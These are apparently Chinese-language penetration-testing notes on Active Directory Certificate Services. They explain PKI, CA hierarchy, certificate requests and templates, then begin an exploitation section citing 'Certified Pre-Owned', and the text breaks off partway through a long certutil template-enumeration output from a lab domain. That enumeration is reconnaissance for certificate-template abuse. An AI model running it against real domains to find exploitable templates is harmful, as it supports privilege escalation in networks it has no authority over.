:::info

  • PKI - Public Key Infrastructure 管理证书和公钥加密的系统
  • AD CS - Active Directory Certificate Services Microsoft 的 PKI 实现,通常在 DC 上运行
  • CA - Certificate Authority PKI 的颁发机构
  • Certificate Template - 一组设置和策略,用于定义 CA 如何生成和何时颁发证书
  • CSR - Certificate Signing Request 发送给 CA 以请求签名证书
  • EKU - Extended/Enhanced Key Usage 定义如何生成证书的对象标识符

:::

介绍

PKI

PKI 其实是一个术语表示: 公钥基本结构,用于实现证书的产生、管理、存储、分发和撤销等功能。

ADCS (AD 证书服务) 就是 PKI 的一个实现,ADCS能够跟现有的ADDS服务进行结合,可以用以加密文件系统,数字签名,以及身份验证

CA

证书颁发机构 (CA) 接受证书申请,根据 CA 的策略验证申请者的信息,然后使用其私钥将其数字签名应用于证书。然后 CA 将证书颁发给证书的使用者。此外,CA 还负责吊销证书和发布证书吊销列表 (CRL)。

ADCS 中的 CA 分为 企业 CA 和 独立 CA,最主要的区别在于企业CA与ADDS服务结合,他的信息存储在ADDS数据库里面(就是LDAP上)。企业CA也支持基于证书模板和自动注册证书

:::tips

举个例子,我们有个有个域名daiker.com,如果要做https,我们就需要找证书颁发机构申请证书,比如说沃通CA。

:::

我们也可以自己搭建一个证书颁发机构。

AD CS - 图1

但是使用自建的证书发布服务之后,浏览器还是不信任我们证书,我们经常可以看到

AD CS - 图2

自行签名的根证书。之所以出现这个是因为电脑本身并不相信我们的CA证书。以下证书是windows内置的CA证书。如果我们能够把我们的CA证书放在这个列表里面,我们的证书就能得到信任。

AD CS - 图3

对于企业来说,如果使用ADCS服务,想让员工的计算机信任我们企业自己的CA证书,有以下几种方式
  1. 安装企业根CA时,它使用组策略将其证书传播到域中所有用户和计算机的“受信任的根证书颁发机构”证书存储
  2. 手动导入CA证书
另外AD CS支持可缩放的分层 CA 模型,在此模型中,子从属 CA 由其父 CA 颁发的证书认证。层次结构顶部的 CA 称为根 CA。根 CA 的子 CA 称为从属 CA。

AD CS - 图4

以上图为例子,每个企业仅有一个根CA,他由自己颁发,在大多数组织中,它们只用于颁发从属 CA,不直接颁发证书。而具体的证书由从属CA颁发,比如网站的证书,LDAPS的证书,这样做方便管理,在机器比较多的域内还能起到负载均衡的作用。当然,AD CS支持分层的CA模型不代表一定要分层,对于比较小的公司,一般都只有一个根CA,所有的证书由这个根CA进行颁发。

证书请求与生成

AD CS - 图5

  1. 客户端生成一个证书申请文件,这一步可以使用openssl生成
  1. openssl req -new -SHA256 -newkey rsa:4096 -nodes -keyout www.netstarsec.com.key -out www.netstarsec.com.csr -subj "/C=CN/ST=Beijing/L=Beijing/O=netstarsec/OU=sec/CN=www.netstarsec.com"
  1. 客户端把证书申请文件发送给CA,然后选择一个证书模板
    AD CS - 图6
  2. CA证书会判断模板是否存在,根据模板的信息判断请求的用户是否有权限申请证书。证书模板会决定证书的主题名是什么,证书的有效时间是多久,证书用于干啥。是不是需要证书管理员批准。
  3. CA会使用自己的私钥来签署证书。签署完的证书可以在颁发列表里面看到

证书模板

证书模板是证书策略的重要元素,是用于证书注册、使用和管理的一组规则和格式。这些规则是指谁可以注册证书。证书的主题名是什么。比如要注册一个web证书,那可以在Web服务器这个默认的证书模板里面定义谁可以注册证书,证书的有效时间是多久,证书用于干啥,证书的主题名是什么,是由申请者提交,还是由证书模板指定。 我们可以使用 <font style="color:rgb(18, 18, 18);background-color:rgb(246, 246, 246);">certtmlp.msc</font> 打开证书模板控制台

AD CS - 图7

这些都是系统默认的证书模板。 如果需要发布一个新的模板的话,可以右键复制模板,然后自己定义这些规则。

利用

Certified Pre-Owned

证书模板枚举

我们可以使用 certutil进行枚举所有的模板并存储在文件中:

  1. C;\> certutil -v -template > cert_templates.txt
  1. Name: Active Directory Enrollment Policy
  2. Id: {163768E2-712B-4E97-A6A3-5E597F91D6F4}
  3. Url: ldap:
  4. 35 Templates:
  5. Template[0]:
  6. TemplatePropCommonName = Administrator
  7. TemplatePropFriendlyName = Administrator
  8. TemplatePropEKUs =
  9. 4 ObjectIds:
  10. 1.3.6.1.4.1.311.10.3.1 Microsoft Trust List Signing
  11. 1.3.6.1.4.1.311.10.3.4 Encrypting File System
  12. 1.3.6.1.5.5.7.3.4 Secure Email
  13. 1.3.6.1.5.5.7.3.2 Client Authentication
  14. TemplatePropCryptoProviders =
  15. 0: Microsoft Enhanced Cryptographic Provider v1.0
  16. 1: Microsoft Base Cryptographic Provider v1.0
  17. TemplatePropMajorRevision = 4
  18. TemplatePropDescription = User
  19. TemplatePropSchemaVersion = 1
  20. TemplatePropMinorRevision = 1
  21. TemplatePropRASignatureCount = 0
  22. TemplatePropMinimumKeySize = 800 (2048)
  23. TemplatePropOID =
  24. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.7
  25. TemplatePropEnrollmentFlags = 29 (41)
  26. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  27. CT_FLAG_PUBLISH_TO_DS -- 8
  28. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  29. TemplatePropSubjectNameFlags = a6000000 (-1509949440)
  30. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  31. CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL -- 4000000 (67108864)
  32. CT_FLAG_SUBJECT_REQUIRE_EMAIL -- 20000000 (536870912)
  33. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  34. TemplatePropPrivateKeyFlags = 10 (16)
  35. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  36. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  37. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  38. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  39. TemplatePropGeneralFlags = 1023a (66106)
  40. CT_FLAG_ADD_EMAIL -- 2
  41. CT_FLAG_PUBLISH_TO_DS -- 8
  42. CT_FLAG_EXPORTABLE_KEY -- 10 (16)
  43. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  44. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  45. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  46. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  47. Allow Enroll LUNAR\Domain Admins
  48. Allow Enroll LUNAR\Enterprise Admins
  49. Allow Full Control LUNAR\Domain Admins
  50. Allow Full Control LUNAR\Enterprise Admins
  51. Allow Read NT AUTHORITY\Authenticated Users
  52. TemplatePropExtensions =
  53. 3 Extensions:
  54. Extension[0]:
  55. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1c
  56. Certificate Template Name (Certificate Type)
  57. Administrator
  58. Extension[1]:
  59. 2.5.29.37: Flags = 0, Length = 2e
  60. Enhanced Key Usage
  61. Microsoft Trust List Signing (1.3.6.1.4.1.311.10.3.1)
  62. Encrypting File System (1.3.6.1.4.1.311.10.3.4)
  63. Secure Email (1.3.6.1.5.5.7.3.4)
  64. Client Authentication (1.3.6.1.5.5.7.3.2)
  65. Extension[2]:
  66. 2.5.29.15: Flags = 1(Critical), Length = 4
  67. Key Usage
  68. Digital Signature, Key Encipherment (a0)
  69. TemplatePropValidityPeriod = 1 Years
  70. TemplatePropRenewalPeriod = 6 Weeks
  71. Template[1]:
  72. TemplatePropCommonName = ClientAuth
  73. TemplatePropFriendlyName = Authenticated Session
  74. TemplatePropEKUs =
  75. 1 ObjectIds:
  76. 1.3.6.1.5.5.7.3.2 Client Authentication
  77. TemplatePropCryptoProviders =
  78. 0: Microsoft Enhanced Cryptographic Provider v1.0
  79. 1: Microsoft Base Cryptographic Provider v1.0
  80. 2: Microsoft Base DSS Cryptographic Provider
  81. TemplatePropMajorRevision = 3
  82. TemplatePropDescription = User
  83. TemplatePropSchemaVersion = 1
  84. TemplatePropMinorRevision = 1
  85. TemplatePropRASignatureCount = 0
  86. TemplatePropMinimumKeySize = 800 (2048)
  87. TemplatePropOID =
  88. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.4
  89. TemplatePropEnrollmentFlags = 20 (32)
  90. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  91. TemplatePropSubjectNameFlags = 82000000 (-2113929216)
  92. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  93. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  94. TemplatePropPrivateKeyFlags = 0
  95. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  96. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  97. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  98. TemplatePropGeneralFlags = 10220 (66080)
  99. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  100. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  101. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  102. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  103. Allow Enroll LUNAR\Domain Admins
  104. Allow Enroll LUNAR\Domain Users
  105. Allow Enroll LUNAR\Enterprise Admins
  106. Allow Full Control LUNAR\Domain Admins
  107. Allow Full Control LUNAR\Enterprise Admins
  108. Allow Read NT AUTHORITY\Authenticated Users
  109. TemplatePropExtensions =
  110. 3 Extensions:
  111. Extension[0]:
  112. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 16
  113. Certificate Template Name (Certificate Type)
  114. ClientAuth
  115. Extension[1]:
  116. 2.5.29.37: Flags = 0, Length = c
  117. Enhanced Key Usage
  118. Client Authentication (1.3.6.1.5.5.7.3.2)
  119. Extension[2]:
  120. 2.5.29.15: Flags = 1(Critical), Length = 4
  121. Key Usage
  122. Digital Signature (80)
  123. TemplatePropValidityPeriod = 1 Years
  124. TemplatePropRenewalPeriod = 6 Weeks
  125. Template[2]:
  126. TemplatePropCommonName = EFS
  127. TemplatePropFriendlyName = Basic EFS
  128. TemplatePropEKUs =
  129. 1 ObjectIds:
  130. 1.3.6.1.4.1.311.10.3.4 Encrypting File System
  131. TemplatePropCryptoProviders =
  132. 0: Microsoft Enhanced Cryptographic Provider v1.0
  133. 1: Microsoft Base Cryptographic Provider v1.0
  134. TemplatePropMajorRevision = 3
  135. TemplatePropDescription = User
  136. TemplatePropSchemaVersion = 1
  137. TemplatePropMinorRevision = 1
  138. TemplatePropRASignatureCount = 0
  139. TemplatePropMinimumKeySize = 800 (2048)
  140. TemplatePropOID =
  141. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.6
  142. TemplatePropEnrollmentFlags = 29 (41)
  143. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  144. CT_FLAG_PUBLISH_TO_DS -- 8
  145. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  146. TemplatePropSubjectNameFlags = 82000000 (-2113929216)
  147. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  148. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  149. TemplatePropPrivateKeyFlags = 10 (16)
  150. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  151. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  152. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  153. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  154. TemplatePropGeneralFlags = 10238 (66104)
  155. CT_FLAG_PUBLISH_TO_DS -- 8
  156. CT_FLAG_EXPORTABLE_KEY -- 10 (16)
  157. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  158. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  159. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  160. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  161. Allow Enroll LUNAR\Domain Admins
  162. Allow Enroll LUNAR\Domain Users
  163. Allow Enroll LUNAR\Enterprise Admins
  164. Allow Full Control LUNAR\Domain Admins
  165. Allow Full Control LUNAR\Enterprise Admins
  166. Allow Read NT AUTHORITY\Authenticated Users
  167. TemplatePropExtensions =
  168. 3 Extensions:
  169. Extension[0]:
  170. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 8
  171. Certificate Template Name (Certificate Type)
  172. EFS
  173. Extension[1]:
  174. 2.5.29.37: Flags = 0, Length = e
  175. Enhanced Key Usage
  176. Encrypting File System (1.3.6.1.4.1.311.10.3.4)
  177. Extension[2]:
  178. 2.5.29.15: Flags = 1(Critical), Length = 4
  179. Key Usage
  180. Key Encipherment (20)
  181. TemplatePropValidityPeriod = 1 Years
  182. TemplatePropRenewalPeriod = 6 Weeks
  183. Template[3]:
  184. TemplatePropCommonName = CAExchange
  185. TemplatePropFriendlyName = CA Exchange
  186. TemplatePropEKUs =
  187. 1 ObjectIds:
  188. 1.3.6.1.4.1.311.21.5 Private Key Archival
  189. TemplatePropCryptoProviders =
  190. 0: Microsoft Enhanced Cryptographic Provider v1.0
  191. 1: Microsoft Base Cryptographic Provider v1.0
  192. TemplatePropMajorRevision = 6a (106)
  193. TemplatePropDescription = Computer
  194. TemplatePropSchemaVersion = 2
  195. TemplatePropMinorRevision = 0
  196. TemplatePropRASignatureCount = 0
  197. TemplatePropMinimumKeySize = 800 (2048)
  198. TemplatePropOID =
  199. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.26 CA Exchange
  200. TemplatePropV1ApplicationPolicy =
  201. 1 ObjectIds:
  202. 1.3.6.1.4.1.311.21.5 Private Key Archival
  203. TemplatePropEnrollmentFlags = 1
  204. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  205. TemplatePropSubjectNameFlags = 1
  206. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  207. TemplatePropPrivateKeyFlags = 0
  208. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  209. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  210. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  211. TemplatePropGeneralFlags = 10040 (65600)
  212. CT_FLAG_MACHINE_TYPE -- 40 (64)
  213. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  214. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  215. Allow Enroll LUNAR\Domain Admins
  216. Allow Enroll LUNAR\Enterprise Admins
  217. Allow Full Control LUNAR\Domain Admins
  218. Allow Full Control LUNAR\Enterprise Admins
  219. Allow Read NT AUTHORITY\Authenticated Users
  220. TemplatePropExtensions =
  221. 4 Extensions:
  222. Extension[0]:
  223. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2b
  224. Certificate Template Information
  225. Template=CA Exchange(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.26)
  226. Major Version Number=106
  227. Minor Version Number=0
  228. Extension[1]:
  229. 2.5.29.37: Flags = 0, Length = d
  230. Enhanced Key Usage
  231. Private Key Archival (1.3.6.1.4.1.311.21.5)
  232. Extension[2]:
  233. 2.5.29.15: Flags = 1(Critical), Length = 4
  234. Key Usage
  235. Key Encipherment (20)
  236. Extension[3]:
  237. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = f
  238. Application Policies
  239. [1]Application Certificate Policy:
  240. Policy Identifier=Private Key Archival
  241. TemplatePropValidityPeriod = 1 Weeks
  242. TemplatePropRenewalPeriod = 1 Days
  243. Template[4]:
  244. TemplatePropCommonName = CEPEncryption
  245. TemplatePropFriendlyName = CEP Encryption
  246. TemplatePropEKUs =
  247. 1 ObjectIds:
  248. 1.3.6.1.4.1.311.20.2.1 Certificate Request Agent
  249. TemplatePropCryptoProviders =
  250. 0: Microsoft RSA SChannel Cryptographic Provider
  251. TemplatePropMajorRevision = 4
  252. TemplatePropDescription = Computer
  253. TemplatePropSchemaVersion = 1
  254. TemplatePropMinorRevision = 1
  255. TemplatePropRASignatureCount = 0
  256. TemplatePropMinimumKeySize = 800 (2048)
  257. TemplatePropOID =
  258. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.22
  259. TemplatePropEnrollmentFlags = 0
  260. TemplatePropSubjectNameFlags = 1
  261. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  262. TemplatePropPrivateKeyFlags = 0
  263. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  264. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  265. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  266. TemplatePropGeneralFlags = 10241 (66113)
  267. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  268. CT_FLAG_MACHINE_TYPE -- 40 (64)
  269. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  270. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  271. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  272. Allow Enroll LUNAR\Domain Admins
  273. Allow Enroll LUNAR\Enterprise Admins
  274. Allow Full Control LUNAR\Domain Admins
  275. Allow Full Control LUNAR\Enterprise Admins
  276. Allow Read NT AUTHORITY\Authenticated Users
  277. TemplatePropExtensions =
  278. 3 Extensions:
  279. Extension[0]:
  280. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1c
  281. Certificate Template Name (Certificate Type)
  282. CEPEncryption
  283. Extension[1]:
  284. 2.5.29.37: Flags = 0, Length = e
  285. Enhanced Key Usage
  286. Certificate Request Agent (1.3.6.1.4.1.311.20.2.1)
  287. Extension[2]:
  288. 2.5.29.15: Flags = 1(Critical), Length = 4
  289. Key Usage
  290. Key Encipherment (20)
  291. TemplatePropValidityPeriod = 2 Years
  292. TemplatePropRenewalPeriod = 6 Weeks
  293. Template[5]:
  294. TemplatePropCommonName = CodeSigning
  295. TemplatePropFriendlyName = Code Signing
  296. TemplatePropEKUs =
  297. 1 ObjectIds:
  298. 1.3.6.1.5.5.7.3.3 Code Signing
  299. TemplatePropCryptoProviders =
  300. 0: Microsoft Enhanced Cryptographic Provider v1.0
  301. 1: Microsoft Base Cryptographic Provider v1.0
  302. 2: Microsoft Base DSS Cryptographic Provider
  303. TemplatePropMajorRevision = 3
  304. TemplatePropDescription = User
  305. TemplatePropSchemaVersion = 1
  306. TemplatePropMinorRevision = 1
  307. TemplatePropRASignatureCount = 0
  308. TemplatePropMinimumKeySize = 800 (2048)
  309. TemplatePropOID =
  310. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.9
  311. TemplatePropEnrollmentFlags = 20 (32)
  312. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  313. TemplatePropSubjectNameFlags = 82000000 (-2113929216)
  314. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  315. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  316. TemplatePropPrivateKeyFlags = 0
  317. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  318. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  319. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  320. TemplatePropGeneralFlags = 10220 (66080)
  321. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  322. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  323. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  324. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  325. Allow Enroll LUNAR\Domain Admins
  326. Allow Enroll LUNAR\Enterprise Admins
  327. Allow Full Control LUNAR\Domain Admins
  328. Allow Full Control LUNAR\Enterprise Admins
  329. Allow Read NT AUTHORITY\Authenticated Users
  330. TemplatePropExtensions =
  331. 3 Extensions:
  332. Extension[0]:
  333. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 18
  334. Certificate Template Name (Certificate Type)
  335. CodeSigning
  336. Extension[1]:
  337. 2.5.29.37: Flags = 0, Length = c
  338. Enhanced Key Usage
  339. Code Signing (1.3.6.1.5.5.7.3.3)
  340. Extension[2]:
  341. 2.5.29.15: Flags = 1(Critical), Length = 4
  342. Key Usage
  343. Digital Signature (80)
  344. TemplatePropValidityPeriod = 1 Years
  345. TemplatePropRenewalPeriod = 6 Weeks
  346. Template[6]:
  347. TemplatePropCommonName = Machine
  348. TemplatePropFriendlyName = Computer
  349. TemplatePropEKUs =
  350. 2 ObjectIds:
  351. 1.3.6.1.5.5.7.3.2 Client Authentication
  352. 1.3.6.1.5.5.7.3.1 Server Authentication
  353. TemplatePropCryptoProviders =
  354. 0: Microsoft RSA SChannel Cryptographic Provider
  355. TemplatePropMajorRevision = 5
  356. TemplatePropDescription = Computer
  357. TemplatePropSchemaVersion = 1
  358. TemplatePropMinorRevision = 1
  359. TemplatePropRASignatureCount = 0
  360. TemplatePropMinimumKeySize = 800 (2048)
  361. TemplatePropOID =
  362. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.14
  363. TemplatePropEnrollmentFlags = 20 (32)
  364. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  365. TemplatePropSubjectNameFlags = 18000000 (402653184)
  366. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  367. CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)
  368. TemplatePropPrivateKeyFlags = 0
  369. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  370. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  371. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  372. TemplatePropGeneralFlags = 10260 (66144)
  373. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  374. CT_FLAG_MACHINE_TYPE -- 40 (64)
  375. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  376. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  377. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DC)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  378. Allow Enroll LUNAR\Domain Admins
  379. Allow Enroll LUNAR\Domain Computers
  380. Allow Enroll LUNAR\Enterprise Admins
  381. Allow Full Control LUNAR\Domain Admins
  382. Allow Full Control LUNAR\Enterprise Admins
  383. Allow Read NT AUTHORITY\Authenticated Users
  384. TemplatePropExtensions =
  385. 3 Extensions:
  386. Extension[0]:
  387. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 10
  388. Certificate Template Name (Certificate Type)
  389. Machine
  390. Extension[1]:
  391. 2.5.29.37: Flags = 0, Length = 16
  392. Enhanced Key Usage
  393. Client Authentication (1.3.6.1.5.5.7.3.2)
  394. Server Authentication (1.3.6.1.5.5.7.3.1)
  395. Extension[2]:
  396. 2.5.29.15: Flags = 1(Critical), Length = 4
  397. Key Usage
  398. Digital Signature, Key Encipherment (a0)
  399. TemplatePropValidityPeriod = 1 Years
  400. TemplatePropRenewalPeriod = 6 Weeks
  401. Template[7]:
  402. TemplatePropCommonName = CrossCA
  403. TemplatePropFriendlyName = Cross Certification Authority
  404. TemplatePropCryptoProviders =
  405. 0: Microsoft Enhanced Cryptographic Provider v1.0
  406. TemplatePropMajorRevision = 69 (105)
  407. TemplatePropDescription = Cross-certified certification authority
  408. TemplatePropSchemaVersion = 2
  409. TemplatePropMinorRevision = 0
  410. TemplatePropRASignatureCount = 1
  411. TemplatePropMinimumKeySize = 800 (2048)
  412. TemplatePropOID =
  413. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.25 Cross Certification Authority
  414. TemplatePropRAEKUs =
  415. 1 ObjectIds:
  416. 1.3.6.1.4.1.311.10.3.10 Qualified Subordination
  417. TemplatePropEnrollmentFlags = 8
  418. CT_FLAG_PUBLISH_TO_DS -- 8
  419. TemplatePropSubjectNameFlags = 1
  420. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  421. TemplatePropPrivateKeyFlags = 10 (16)
  422. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  423. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  424. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  425. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  426. TemplatePropGeneralFlags = 10810 (67600)
  427. CT_FLAG_EXPORTABLE_KEY -- 10 (16)
  428. CT_FLAG_IS_CROSS_CA -- 800 (2048)
  429. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  430. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
